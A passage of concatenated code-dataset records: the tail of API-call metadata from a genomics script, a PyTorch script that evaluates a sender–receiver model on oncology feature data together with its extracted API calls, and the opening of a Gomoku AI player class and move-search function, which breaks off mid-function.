load_genome, num2acgt, acgt2num, seq2mat, encoding_matrix\n'), ((4297, 4316), 'numpy.copy', 'np.copy', (['kmer_whole'], {}), '(kmer_whole)\n', (4304, 4316), True, 'import numpy as np\n'), ((7274, 7337), 'numpy.savetxt', 'np.savetxt', (['(outdir + name_test)', 'table'], {'delimiter': '"""\t"""', 'fmt': '"""%s"""'}), "(outdir + name_test, table, delimiter='\\t', fmt='%s')\n", (7284, 7337), True, 'import numpy as np\n'), ((4405, 4418), 'numpy.copy', 'np.copy', (['kmer'], {}), '(kmer)\n', (4412, 4418), True, 'import numpy as np\n'), ((7210, 7232), 'os.path.exists', 'os.path.exists', (['outdir'], {}), '(outdir)\n', (7224, 7232), False, 'import os\n'), ((7246, 7265), 'os.makedirs', 'os.makedirs', (['outdir'], {}), '(outdir)\n', (7257, 7265), False, 'import os\n'), ((2980, 3019), 'Loading_data.checkseq', 'checkseq', (['chrkey', 'start', 'end', 'sequences'], {}), '(chrkey, start, end, sequences)\n', (2988, 3019), False, 'from Loading_data import seq_to_kspec, checkseq, chunks, loadindex, load_genome, num2acgt, acgt2num, seq2mat, encoding_matrix\n'), ((3824, 3868), 'Loading_data.seq2mat', 'seq2mat', (['sequences[item[1]][item[2]:item[3]]'], {}), '(sequences[item[1]][item[2]:item[3]])\n', (3831, 3868), False, 'from Loading_data import seq_to_kspec, checkseq, chunks, loadindex, load_genome, num2acgt, acgt2num, seq2mat, encoding_matrix\n'), ((4247, 4267), 'numpy.array', 'np.array', (['kmer_whole'], {}), '(kmer_whole)\n', (4255, 4267), True, 'import numpy as np\n'), ((4952, 4976), 'numpy.array', 'np.array', (['test_data_kmer'], {}), '(test_data_kmer)\n', (4960, 4976), True, 'import numpy as np\n'), ((670, 681), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (679, 681), False, 'import os\n'), ((3575, 3614), 'Loading_data.checkseq', 'checkseq', (['chrkey', 'start', 'end', 'sequences'], {}), '(chrkey, start, end, sequences)\n', (3583, 3614), False, 'from Loading_data import seq_to_kspec, checkseq, chunks, loadindex, load_genome, num2acgt, acgt2num, seq2mat, encoding_matrix\n')] |
from torch import optim
from torch.autograd import Variable
from torchvision import transforms, models
import torch
from sacred import Experiment
from sacred.observers import FileStorageObserver
from EL import CONSTS
import argparse
import numpy as np
import os
from EL.data.data import OncologyDataset
from EL.models.models import SenderOncoFeat, ReceiverOncoFeat
import torch.nn as nn
from aviation.utils.pytorchtools import EarlyStopping
from torch.utils.tensorboard import SummaryWriter
from torch.optim.lr_scheduler import ReduceLROnPlateau
import torch.nn.functional as F
import matplotlib.pyplot as plt
import pickle
# Directory where sacred run logs would be stored (the file observer below
# is currently disabled).
LOG_DIR_PATH = os.path.join(CONSTS.RESULTS_DIR, 'logs')
# PLOT_DIR = CONSTS.OUTPUT_DIR
ex = Experiment('EL')  # sacred experiment; @ex.config and @ex.automain hang off it
# ex.observers.append(FileStorageObserver(LOG_DIR_PATH))
@ex.config
def config():
    """Sacred config scope: every local assigned here becomes a config entry,
    exposed to main() through _run.config (sacred captures the locals by
    introspection, so the names themselves are the config keys)."""
    batch_size = 171
    epochs = 2000
    log_interval = 10  # batches between progress printouts in train_epoch
    img_size_x = 224
    img_size_y = 224
    exp_name = 'oncology_features_game'  # used to name output/model/log dirs
    gpu = 0  # < 0 forces CPU in main()
    pretrained = False
    train_batches_per_epoch = None
    val_batches_per_epoch = None
    max_len = 3
    embed_dim = 200
    lr = 1e-3  # Adam learning rate
    hidden_size = 100  # sender output width == receiver input width
    # NOTE(review): main() reads args.seed, which is not declared here --
    # sacred normally auto-injects a 'seed' entry; verify that is intended.
class OncoModel(nn.Module):
    """Two-stage network for the oncology game.

    The sender encodes the input; the receiver maps that encoding to the
    final output. Calling the model pipes the input through both in order.
    """

    def __init__(self, sender, receiver):
        super(OncoModel, self).__init__()
        # Registered as submodules so their parameters are trained together.
        self.sender = sender
        self.receiver = receiver

    def forward(self, x):
        # sender first, then receiver, without an intermediate name.
        return self.receiver(self.sender(x))
def loss_function(output, label):
    """Mean cross-entropy loss for multi-class classification.

    Parameters
    ----------
    output : torch.Tensor
        Raw (unnormalized) class scores of shape (batch, n_classes).
    label : torch.Tensor
        Ground-truth class indices of shape (batch,).

    Returns
    -------
    torch.Tensor
        Scalar mean cross-entropy loss.
    """
    # F.cross_entropy is the functional equivalent of nn.CrossEntropyLoss()(...)
    # but avoids constructing a throwaway module object on every call.
    return F.cross_entropy(output, label)
def train_epoch(epoch, model, train_data_loader, device, optimizer, args):
    """Run one optimization pass over the training set.

    Parameters
    ----------
    epoch : int
        Current epoch number (only used in log messages).
    model : nn.Module
        Network mapping a float input batch to class scores.
    train_data_loader : torch.utils.data.DataLoader
        Yields (inputs, labels) batches; may yield None for dropped batches.
    device : torch.device
        Device the model lives on; batches are moved there.
    optimizer : torch.optim.Optimizer
        Optimizer stepping the model parameters.
    args : argparse.Namespace
        Must provide args.log_interval (batches between progress prints).

    Returns
    -------
    (float, float)
        Accumulated loss and training accuracy in [0, 1].
    """
    model.train()
    train_loss = 0.0
    total = 0
    correct = 0
    for batch_idx, datas in enumerate(train_data_loader):
        if datas is None:  # tolerate collate functions that drop bad batches
            continue
        label = datas[1].to(device)
        # BUGFIX: the original wrapped the batch in the long-deprecated
        # autograd.Variable and hard-cast with torch.cuda.FloatTensor, which
        # crashes on CPU-only machines. .to(device).float() is equivalent and
        # device-agnostic.
        data = datas[0].to(device).float()
        optimizer.zero_grad()
        out = model(data)
        loss = loss_function(out, label)
        loss.backward()
        _, pred = torch.max(out, 1)
        total += len(label)
        correct += (pred == label).sum().item()
        batch_loss = loss.item()  # detach to a plain float (was loss.data)
        train_loss += batch_loss
        optimizer.step()
        if batch_idx % args.log_interval == 0:
            print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}\tAccuracy: {:.6f}'.format(
                epoch, batch_idx * len(data), len(train_data_loader.dataset),
                100. * batch_idx / len(train_data_loader),
                batch_loss / len(data), correct / total))
    # NOTE(review): this divides a sum of per-batch *mean* losses by the
    # dataset size -- kept as-is for continuity with previously logged values.
    train_loss = train_loss / len(train_data_loader.dataset)
    train_accuracy = correct / total
    return train_loss, train_accuracy
def val(model, val_data_loader, device):
    """Evaluate the model on the validation set.

    Parameters
    ----------
    model : nn.Module
        Network mapping a float input batch to class scores.
    val_data_loader : torch.utils.data.DataLoader
        Yields (inputs, labels) batches; may yield None for dropped batches.
    device : torch.device
        Device the model lives on; batches are moved there.

    Returns
    -------
    (float, float)
        Accumulated loss (sum of per-batch mean losses over dataset size,
        matching train_epoch's accounting) and accuracy in [0, 1].
    """
    model.eval()
    val_loss = 0.0
    correct = 0
    total = 0
    # Inference only: skip autograd bookkeeping so no extra GPU memory is held.
    with torch.no_grad():
        for i, datas in enumerate(val_data_loader):
            if datas is None:
                continue
            label = datas[1].to(device)
            # BUGFIX: replaced the hard-coded torch.cuda.FloatTensor cast
            # (which crashes on CPU-only machines) with a device-agnostic
            # conversion.
            data = datas[0].to(device).float()
            out = model(data)
            val_loss += loss_function(out, label).item()
            _, pred = torch.max(out, 1)
            total += len(label)
            correct += (pred == label).sum().item()
    val_loss /= len(val_data_loader.dataset)
    val_accuracy = correct / total
    return val_loss, val_accuracy
@ex.automain
def main(_run):
    """Evaluate a trained sender/receiver game model on the oncology val set.

    The training, scheduler, early-stopping and tensorboard calls below are
    all commented out, so this entry point currently only loads
    'best_model.pth' and reports validation loss/accuracy each "epoch".
    """
    # ===============
    # INTRO
    # ===============
    # Wrap the sacred config dict so entries read as attributes.
    args = argparse.Namespace(**_run.config)
    # NOTE(review): 'seed' is not declared in @ex.config above; sacred
    # normally auto-injects one -- verify.
    torch.manual_seed(args.seed)
    np.random.seed(args.seed)
    if args.gpu > -1:
        torch.backends.cudnn.deterministic = True
        torch.backends.cudnn.benchmark = False
    # NOTE(review): args.gpu only selects CPU vs cuda:0; the index itself is
    # never used to pick a specific GPU.
    if args.gpu < 0:
        device = torch.device("cpu")
    else:
        device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    # Image augmentations; appear unused below since the datasets are built
    # with data_type='features' and no transform is passed.
    data_transforms = {
        'train': transforms.Compose([
            # transforms.Resize((22, 22)),
            # transforms.RandomHorizontalFlip(),
            transforms.RandomVerticalFlip(),
            transforms.RandomRotation(degrees=45),
            transforms.ToTensor(),
        ]),
        'val': transforms.Compose([
            # transforms.Resize((224, 224)),
            transforms.ToTensor(),
        ]),
    }
    ## DATASET
    with open(os.path.join(CONSTS.DATA_DIR, 'pathology', 'train.pkl'), 'rb') as file:
        train_data = pickle.load(file)
    with open(os.path.join(CONSTS.DATA_DIR, 'pathology', 'test.pkl'), 'rb') as file:
        val_data = pickle.load(file)
    train_dataset = OncologyDataset(data_dict=train_data, data_type='features')
    train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True)
    val_dataset = OncologyDataset(data_dict=val_data, data_type='features')
    val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=args.batch_size, shuffle=False)
    # Build the two halves of the game model.
    sender = SenderOncoFeat(hidden_size=args.hidden_size)
    receiver = ReceiverOncoFeat(input_size=args.hidden_size)
    # Create per-experiment model / output / tensorboard directories.
    model_path = os.path.join(CONSTS.RESULTS_DIR, 'models', args.exp_name)
    if not os.path.exists(model_path):
        os.makedirs(model_path)
    output_dir = os.path.join(CONSTS.RESULTS_DIR, 'outputs', args.exp_name)
    if not os.path.exists(output_dir):
        os.makedirs(output_dir)
    tensorboard_path = os.path.join(CONSTS.RESULTS_DIR, 'logs', 'tensorboard', args.exp_name)
    if not os.path.exists(tensorboard_path):
        os.makedirs(tensorboard_path)
    # Restore the best checkpoint saved by a previous training run.
    model = OncoModel(sender, receiver)
    model.load_state_dict(torch.load(os.path.join(model_path, 'best_model.pth')))
    model.to(device)
    optimizer = optim.Adam(model.parameters(), lr=args.lr)
    scheduler = ReduceLROnPlateau(optimizer, 'min', patience=3, verbose=True)
    writer = SummaryWriter(tensorboard_path, comment=args.exp_name)
    patience = 20
    early_stopping = EarlyStopping(patience=patience, verbose=True, save=os.path.join(model_path, 'best_model.pth'))
    # Evaluation loop (training path disabled -- see commented lines).
    for epoch in range(1, args.epochs + 1):
        # train_epoch_loss, train_epoch_accuracy = train_epoch(epoch, model, train_loader, device, optimizer, args)
        # print('====> Epoch: {} Average training loss: {:.4f}'.format(
        #     epoch, train_epoch_loss))
        # print('====> Epoch: {} Average training accuracy: {:.4f} %'.format(
        #     epoch, train_epoch_accuracy*100))
        val_epoch_loss, val_epoch_accuracy = val(model, val_loader, device)
        print('====> val set loss: {:.4f}'.format(val_epoch_loss))
        print('====> val set accuracy: {:.4f} %'.format(val_epoch_accuracy*100))
        # writer.add_scalar('Loss/train', train_epoch_loss, epoch)
        # writer.add_scalar('Loss/val', val_epoch_loss, epoch)
        # writer.add_scalar('Accuracy/train', train_epoch_accuracy, epoch)
        # writer.add_scalar('Accuracy/val', val_epoch_accuracy, epoch)
        #
        # scheduler.step(train_epoch_loss)
        # early_stopping(val_epoch_loss, model)
        #
    # writer.close() | [
"argparse.Namespace",
"numpy.random.seed",
"EL.models.models.SenderOncoFeat",
"pickle.load",
"torch.device",
"torch.no_grad",
"os.path.join",
"torch.utils.data.DataLoader",
"torchvision.transforms.RandomRotation",
"torch.optim.lr_scheduler.ReduceLROnPlateau",
"os.path.exists",
"EL.models.model... | [((640, 680), 'os.path.join', 'os.path.join', (['CONSTS.RESULTS_DIR', '"""logs"""'], {}), "(CONSTS.RESULTS_DIR, 'logs')\n", (652, 680), False, 'import os\n'), ((718, 734), 'sacred.Experiment', 'Experiment', (['"""EL"""'], {}), "('EL')\n", (728, 734), False, 'from sacred import Experiment\n'), ((3568, 3601), 'argparse.Namespace', 'argparse.Namespace', ([], {}), '(**_run.config)\n', (3586, 3601), False, 'import argparse\n'), ((3606, 3634), 'torch.manual_seed', 'torch.manual_seed', (['args.seed'], {}), '(args.seed)\n', (3623, 3634), False, 'import torch\n'), ((3639, 3664), 'numpy.random.seed', 'np.random.seed', (['args.seed'], {}), '(args.seed)\n', (3653, 3664), True, 'import numpy as np\n'), ((4651, 4710), 'EL.data.data.OncologyDataset', 'OncologyDataset', ([], {'data_dict': 'train_data', 'data_type': '"""features"""'}), "(data_dict=train_data, data_type='features')\n", (4666, 4710), False, 'from EL.data.data import OncologyDataset\n'), ((4730, 4818), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['train_dataset'], {'batch_size': 'args.batch_size', 'shuffle': '(True)'}), '(train_dataset, batch_size=args.batch_size,\n shuffle=True)\n', (4757, 4818), False, 'import torch\n'), ((4833, 4890), 'EL.data.data.OncologyDataset', 'OncologyDataset', ([], {'data_dict': 'val_data', 'data_type': '"""features"""'}), "(data_dict=val_data, data_type='features')\n", (4848, 4890), False, 'from EL.data.data import OncologyDataset\n'), ((4908, 4995), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['val_dataset'], {'batch_size': 'args.batch_size', 'shuffle': '(False)'}), '(val_dataset, batch_size=args.batch_size,\n shuffle=False)\n', (4935, 4995), False, 'import torch\n'), ((5007, 5051), 'EL.models.models.SenderOncoFeat', 'SenderOncoFeat', ([], {'hidden_size': 'args.hidden_size'}), '(hidden_size=args.hidden_size)\n', (5021, 5051), False, 'from EL.models.models import SenderOncoFeat, ReceiverOncoFeat\n'), ((5067, 5112), 
'EL.models.models.ReceiverOncoFeat', 'ReceiverOncoFeat', ([], {'input_size': 'args.hidden_size'}), '(input_size=args.hidden_size)\n', (5083, 5112), False, 'from EL.models.models import SenderOncoFeat, ReceiverOncoFeat\n'), ((5133, 5190), 'os.path.join', 'os.path.join', (['CONSTS.RESULTS_DIR', '"""models"""', 'args.exp_name'], {}), "(CONSTS.RESULTS_DIR, 'models', args.exp_name)\n", (5145, 5190), False, 'import os\n'), ((5280, 5338), 'os.path.join', 'os.path.join', (['CONSTS.RESULTS_DIR', '"""outputs"""', 'args.exp_name'], {}), "(CONSTS.RESULTS_DIR, 'outputs', args.exp_name)\n", (5292, 5338), False, 'import os\n'), ((5434, 5504), 'os.path.join', 'os.path.join', (['CONSTS.RESULTS_DIR', '"""logs"""', '"""tensorboard"""', 'args.exp_name'], {}), "(CONSTS.RESULTS_DIR, 'logs', 'tensorboard', args.exp_name)\n", (5446, 5504), False, 'import os\n'), ((5807, 5868), 'torch.optim.lr_scheduler.ReduceLROnPlateau', 'ReduceLROnPlateau', (['optimizer', '"""min"""'], {'patience': '(3)', 'verbose': '(True)'}), "(optimizer, 'min', patience=3, verbose=True)\n", (5824, 5868), False, 'from torch.optim.lr_scheduler import ReduceLROnPlateau\n'), ((5882, 5936), 'torch.utils.tensorboard.SummaryWriter', 'SummaryWriter', (['tensorboard_path'], {'comment': 'args.exp_name'}), '(tensorboard_path, comment=args.exp_name)\n', (5895, 5936), False, 'from torch.utils.tensorboard import SummaryWriter\n'), ((1467, 1488), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {}), '()\n', (1486, 1488), True, 'import torch.nn as nn\n'), ((1804, 1822), 'torch.autograd.Variable', 'Variable', (['datas[0]'], {}), '(datas[0])\n', (1812, 1822), False, 'from torch.autograd import Variable\n'), ((2042, 2059), 'torch.max', 'torch.max', (['out', '(1)'], {}), '(out, 1)\n', (2051, 2059), False, 'import torch\n'), ((2880, 2895), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2893, 2895), False, 'import torch\n'), ((3823, 3842), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (3835, 3842), False, 
'import torch\n'), ((4489, 4506), 'pickle.load', 'pickle.load', (['file'], {}), '(file)\n', (4500, 4506), False, 'import pickle\n'), ((4612, 4629), 'pickle.load', 'pickle.load', (['file'], {}), '(file)\n', (4623, 4629), False, 'import pickle\n'), ((5202, 5228), 'os.path.exists', 'os.path.exists', (['model_path'], {}), '(model_path)\n', (5216, 5228), False, 'import os\n'), ((5238, 5261), 'os.makedirs', 'os.makedirs', (['model_path'], {}), '(model_path)\n', (5249, 5261), False, 'import os\n'), ((5350, 5376), 'os.path.exists', 'os.path.exists', (['output_dir'], {}), '(output_dir)\n', (5364, 5376), False, 'import os\n'), ((5386, 5409), 'os.makedirs', 'os.makedirs', (['output_dir'], {}), '(output_dir)\n', (5397, 5409), False, 'import os\n'), ((5516, 5548), 'os.path.exists', 'os.path.exists', (['tensorboard_path'], {}), '(tensorboard_path)\n', (5530, 5548), False, 'import os\n'), ((5558, 5587), 'os.makedirs', 'os.makedirs', (['tensorboard_path'], {}), '(tensorboard_path)\n', (5569, 5587), False, 'import os\n'), ((3243, 3260), 'torch.max', 'torch.max', (['out', '(1)'], {}), '(out, 1)\n', (3252, 3260), False, 'import torch\n'), ((4396, 4451), 'os.path.join', 'os.path.join', (['CONSTS.DATA_DIR', '"""pathology"""', '"""train.pkl"""'], {}), "(CONSTS.DATA_DIR, 'pathology', 'train.pkl')\n", (4408, 4451), False, 'import os\n'), ((4522, 4576), 'os.path.join', 'os.path.join', (['CONSTS.DATA_DIR', '"""pathology"""', '"""test.pkl"""'], {}), "(CONSTS.DATA_DIR, 'pathology', 'test.pkl')\n", (4534, 4576), False, 'import os\n'), ((5666, 5708), 'os.path.join', 'os.path.join', (['model_path', '"""best_model.pth"""'], {}), "(model_path, 'best_model.pth')\n", (5678, 5708), False, 'import os\n'), ((6030, 6072), 'os.path.join', 'os.path.join', (['model_path', '"""best_model.pth"""'], {}), "(model_path, 'best_model.pth')\n", (6042, 6072), False, 'import os\n'), ((3895, 3920), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (3918, 3920), False, 'import torch\n'), ((4100, 
4131), 'torchvision.transforms.RandomVerticalFlip', 'transforms.RandomVerticalFlip', ([], {}), '()\n', (4129, 4131), False, 'from torchvision import transforms, models\n'), ((4145, 4182), 'torchvision.transforms.RandomRotation', 'transforms.RandomRotation', ([], {'degrees': '(45)'}), '(degrees=45)\n', (4170, 4182), False, 'from torchvision import transforms, models\n'), ((4196, 4217), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (4215, 4217), False, 'from torchvision import transforms, models\n'), ((4324, 4345), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (4343, 4345), False, 'from torchvision import transforms, models\n')] |
#!/usr/bin/env python
from __future__ import print_function, division
import itertools, time, copy
import collections, random
import os, pickle
import numba
import numpy as np
board_size = 15  # side length of the (square) Gomoku board
show_q = False  # debug flag; not referenced in this chunk -- presumably toggles Q-value printing elsewhere
class AIPlayer:
def __init__(self, name, model):
self.name = name
self.model = model
self.learndata = dict()
self.opponent = None
self.all_interest_states = np.zeros(board_size**4 * 3, dtype=np.float16).reshape(board_size**2, board_size, board_size, 3)
self.move_interest_values = np.zeros(board_size**2, dtype=np.float32).reshape(board_size,board_size)
self.reset()
self.reset_cache()
def reset(self):
""" Reset before a new game """
self.hist_states = []
self.surprised = False
self.started_from_beginning = True
    def reset_cache(self):
        """Discard cached model evaluations; call before using a new model,
        since cached values were produced by the old one."""
        # NOTE(review): LRU is not defined in this chunk -- presumably an
        # LRU-cache class (cachetools-style) defined elsewhere in the file;
        # verify.
        self.tf_cache = LRU(maxsize=1000000)
    def strategy(self, board_state):
        """Choose the next stone for the current player.

        Parameters
        ----------
        board_state : tuple
            (board, last_move, playing, board_size) where
            board = (x_stones, o_stones), each a set of 1-indexed (row, col)
            positions, e.g. x_stones = {(8,8), (8,9), (8,10), (8,11)};
            playing = 0|1 is the index of the side to move.

        Returns
        -------
        (int, int)
            1-indexed (row, col) of the chosen move.
        """
        # load input board_state
        # NOTE: the unpacked board_size shadows the module-level constant
        # inside this method.
        board, last_move, playing, board_size = board_state
        self.playing_white = bool(playing)
        my_stones = board[playing]
        opponent_stones = board[1-playing]
        # NOTE(review): converted to 0-indexed here but never used below.
        last_move = (last_move[0]-1, last_move[1]-1)
        # build new state representation: +1 my stone, -1 opponent, 0 empty
        state = np.zeros(board_size**2, dtype=np.int8).reshape(board_size, board_size)
        for i,j in my_stones:
            state[i-1,j-1] = 1
        for i,j in opponent_stones:
            state[i-1,j-1] = -1
        # prepare input for best_action_q; the initial alpha/beta bracket is
        # wider than the [-1, 1] win-rate range returned by best_action_q,
        # so nothing is pruned at the root
        alpha = -2.0
        beta = 2.0
        empty_spots_left = board_size**2 - len(my_stones) - len(opponent_stones) # np.sum(state==0)
        # search from the perspective of player=1 (this player)
        best_move, best_q = self.best_action_q(state, empty_spots_left, alpha, beta, 1)
        # record game outcome statistics (method defined elsewhere in the file)
        self.update_if_game_finish(state, best_move, best_q, empty_spots_left)
        # convert the chosen move back to the caller's 1-indexed coordinates
        return (best_move[0]+1, best_move[1]+1)
def best_action_q(self, state, empty_spots_left, alpha, beta, player):
""" get the optimal action for a state and the predicted win rate
Params
------
state: np.ndarray of shape (15, 15)
The current game state in a matrix. 1 is my stone, -1 is opponent stone, 0 is empty
empty_spots_left: int
How many empty spots are left, easy to keep track
alpha: float
Current alpha value in alpha-beta pruning, the running min of the max win rate
beta: float
Current beta value in alpha-beta pruning, the running max of the min win rate
player: int
The current player. 1 is me, -1 is opponent
Returns
-------
best_move: tuple(int, int)
The best move on the board, given by (r, c)
best_q: float
The value the best move. 1.0 means 100% win, -1.0 means 100% lose, 0 means draw
"""
if empty_spots_left == 0: # Board filled up, it's a tie
return None, 0.0
verbose = False
n_moves = 40 if empty_spots_left > 200 else 20
self.move_interest_values.fill(0) # reuse the same array to save init cost
self.move_interest_values[4:11, 4:11] = 5.0 # manually assign higher interest in middle
interested_moves = find_interesting_moves(state, empty_spots_left, self.move_interest_values, player, n_moves, verbose)
#best_move = (-1,-1) # admit defeat if all moves have 0 win rate
best_move = (interested_moves[0,0], interested_moves[0,1]) # continue to play even I'm losing
if len(interested_moves) == 1:
state[best_move] = player # temporarily put the stone down
if i_lost(state, player):
# if i lost after putting this stone, return -1.0 win rate
best_q = -1.0 if player == 1 else 1.0
return best_move, best_q
if i_will_win(state, best_move, player):
# if i will win no matter what opponent does, return 1.0 win rate
best_q = 1.0 if player == 1 else -1.0
return best_move, best_q
state[best_move] = 0 # reset the temporarily stone
# find the known moves among interested_moves
tf_moves = [] # all unknown moves will be evaluated by tf_evaluate_max_u
tf_move_ids = []
max_q = -1.0
for this_move in interested_moves:
this_move = (this_move[0], this_move[1])
assert state[this_move] == 0 # interest move should be empty here
state[this_move] = 1
this_state_id = state.tobytes()
state[this_move] = 0
cached_q = None
# try read from learndata
try:
cached_q = self.learndata[this_state_id][1]
except KeyError:
pass
# try use cache
if cached_q is None:
try:
cached_q = self.tf_cache[this_state_id]
except KeyError:
pass
# add to compute list
if cached_q is not None:
if cached_q > max_q:
max_q = cached_q
best_move = this_move
else:
tf_moves.append(this_move)
tf_move_ids.append(this_state_id)
# n_found = len(interested_moves) - len(tf_moves)
# if n_found > 0:
# print(f'Found {n_found} moves in learndata')
# run tensorflow model predict
n_tf = len(tf_moves)
if n_tf > 0:
all_interest_states = self.all_interest_states[:n_tf] # we only need a slice of the big array
all_interest_states[:,:,:,0] = (state == 1)
all_interest_states[:,:,:,1] = (state == -1)
all_interest_states[:,:,:,2] = 0 if self.playing_white else 1 # if I'm black, next is me so black
for i,current_move in enumerate(tf_moves):
ci, cj = current_move
all_interest_states[i,ci,cj,0] = 1 # put current move down
predict_y = self.model.predict(all_interest_states, batch_size=n_tf)
predict_y = np.array(predict_y).flatten()
# store predict result in cache
for move_id, y in zip(tf_move_ids, predict_y):
self.tf_cache[move_id] = y
# find the largest y
idx = np.argmax(predict_y)
if predict_y[idx] > max_q:
max_q = predict_y[idx]
best_move = tf_moves[idx]
return best_move, max_q
def update_if_game_finish(self, state, best_move, best_q, empty_spots_left):
# store data for this step in opponent learn data
opponent_state = -state
opponent_state_id = opponent_state.tobytes()
opponent_q = -best_q
if opponent_state_id not in self.opponent.learndata:
self.opponent.learndata[opponent_state_id] = [opponent_state, opponent_q, 1]
# record the history states
self.hist_states.append(opponent_state_id)
# check if game finish
state[best_move] = 1
game_result = None
new_u = 0
if i_win(state, best_move, 1):
new_u = -1.0
game_result = 'win'
elif i_lost(state, 1):
new_u = 1.0
game_result = 'lose'
elif empty_spots_left <= 2:
new_u = 0
game_result = 'draw'
if game_result and self.started_from_beginning is True:
discount = 0.9
for opponent_state_id in self.hist_states[::-1]:
st, u, n_visited = self.opponent.learndata[opponent_state_id]
n_visited += 1
new_u = u + discount * (new_u - u) / n_visited**0.5 # this is the learning rate
# surprise
if (game_result == 'win' and new_u > 0.1) or (game_result == 'lose' and new_u < -0.1):
self.surprised = True
self.opponent.learndata[opponent_state_id] = (st, new_u, n_visited)
print(f"Updated U from {u:9.6f} to {new_u:9.6f} [{n_visited}]")
print(f"{self.name}: Updated win rate of {len(self.hist_states)} states")
self.started_from_beginning = False # we only update once
# Below are utility functions
@numba.jit(nopython=True, nogil=True)
def find_interesting_moves(state, empty_spots_left, move_interest_values, player, n_moves, verbose=False):
    """ Look at state and find the interesting n_moves moves.
    input:
    -------
    state: numpy.array board_size x board_size
    empty_spots_left: number of empty spots on the board
    move_interest_values: board_size x board_size buffer of interest scores (mutated in place)
    player: 1 or -1, the current player
    n_moves: int, desired number of interesting moves
    verbose: if True, print the selected moves and their scores
    output:
    -------
    interested_moves: numpy.array final_n_moves x 2
        *note : final_n_moves = 1 if limited (forced block or immediate win)
        * else final_n_moves = n_moves + number of length-4 moves
        *note2: final_n_moves will not exceed empty_spots_left
    """
    force_to_block = False
    exist_will_win_move = False
    directions = ((1,1), (1,0), (0,1), (1,-1))
    final_single_move = np.zeros(2, dtype=np.int64).reshape(1,2) # for returning the single move
    for r in range(board_size):
        for c in range(board_size):
            if state[r,c] != 0: continue
            interest_value = 10 # as long as it's a valid point, this is for avoiding the taken spaces
            my_hard_4 = 0
            for dr, dc in directions:
                my_line_length = 1 # last_move
                opponent_line_length = 1
                # try to extend in the positive direction (max 5 times to check overline)
                ext_r = r
                ext_c = c
                skipped_1 = 0
                my_blocked = False
                opponent_blocked = False
                for i in range(5):
                    ext_r += dr
                    ext_c += dc
                    if ext_r < 0 or ext_r >= board_size or ext_c < 0 or ext_c >= board_size:
                        break
                    elif state[ext_r, ext_c] == player:
                        if my_blocked == True:
                            break
                        else:
                            my_line_length += 1
                            opponent_blocked = True
                    elif state[ext_r, ext_c] == -player:
                        if opponent_blocked == True:
                            break
                        else:
                            opponent_line_length += 1
                            my_blocked = True
                    elif skipped_1 == 0:
                        skipped_1 = i + 1 # allow one skip and record the position of the skip
                    else:
                        # peek at the next one and if it might be useful, add some interest
                        # NOTE(review): ext_r+dr / ext_c+dc may fall outside the board here;
                        # numba nopython mode does not bounds-check — confirm this cannot misread
                        if ((state[ext_r+dr, ext_c+dc] == player) and (my_blocked == False)) or ((state[ext_r+dr, ext_c+dc] == -player) and (opponent_blocked == False)):
                            interest_value += 15
                        break
                # the backward counting starts at the furthest "unskipped" stone
                forward_my_open = False
                forward_opponent_open = False
                if skipped_1 == 0:
                    my_line_length_back = my_line_length
                    opponent_line_length_back = opponent_line_length
                elif skipped_1 == 1:
                    my_line_length_back = 1
                    opponent_line_length_back = 1
                    forward_my_open = True
                    forward_opponent_open = True
                else:
                    if my_blocked == False:
                        my_line_length_back = skipped_1
                        opponent_line_length_back = 1
                        forward_my_open = True
                    else:
                        my_line_length_back = 1
                        opponent_line_length_back = skipped_1
                        forward_opponent_open = True
                my_line_length_no_skip = my_line_length_back
                opponent_line_length_no_skip = opponent_line_length_back
                # backward is a little complicated, will try to extend my stones first
                ext_r = r
                ext_c = c
                skipped_2 = 0
                opponent_blocked = False
                for i in range(6-my_line_length_no_skip):
                    ext_r -= dr
                    ext_c -= dc
                    if ext_r < 0 or ext_r >= board_size or ext_c < 0 or ext_c >= board_size:
                        break
                    elif state[ext_r, ext_c] == player:
                        my_line_length_back += 1
                        opponent_blocked = True
                    elif state[ext_r, ext_c] == -player:
                        break
                    else:
                        if skipped_2 == 0:
                            skipped_2 = i + 1
                        else:
                            # peek at the next one and if it might be useful, add some interest
                            if state[ext_r-dr, ext_c-dc] == player:
                                interest_value += 15
                            break
                # see if i'm winning
                if my_line_length_back == 5:
                    # if there are 5 stones in backward counting, and it's not skipped in the middle
                    if skipped_2 == 0 or skipped_2 == (6-my_line_length_no_skip):
                        # i will win with this move, I will place the stone
                        final_single_move[0,0] = r
                        final_single_move[0,1] = c
                        return final_single_move
                # extend my forward line length to check if there is hard 4
                if skipped_2 == 0:
                    my_line_length += my_line_length_back - my_line_length_no_skip
                else:
                    my_line_length += skipped_2 - 1
                backward_my_open = True if skipped_2 > 0 else False
                backward_opponent_open = False
                # then try to extend the opponent
                if opponent_blocked == True:
                    if skipped_2 == 1:
                        backward_opponent_open = True
                    skipped_2 = 0 # reset the skipped_2 here to enable the check of opponent 5 later
                else:
                    ext_r = r
                    ext_c = c
                    skipped_2 = 0
                    for i in range(6-opponent_line_length_no_skip):
                        ext_r -= dr
                        ext_c -= dc
                        if ext_r < 0 or ext_r >= board_size or ext_c < 0 or ext_c >= board_size:
                            break
                        elif state[ext_r, ext_c] == player:
                            break
                        elif state[ext_r, ext_c] == -player:
                            opponent_line_length_back += 1
                        else:
                            if skipped_2 == 0:
                                skipped_2 = i + 1
                            else:
                                # peek at the next one and if it might be useful, add some interest
                                if state[ext_r-dr, ext_c-dc] == -player:
                                    interest_value += 15
                                break
                    # extend opponent forward line length to check if there is hard 4
                    if skipped_2 == 0:
                        opponent_line_length += opponent_line_length_back - opponent_line_length_no_skip
                    else:
                        opponent_line_length += skipped_2 - 1
                        backward_opponent_open = True
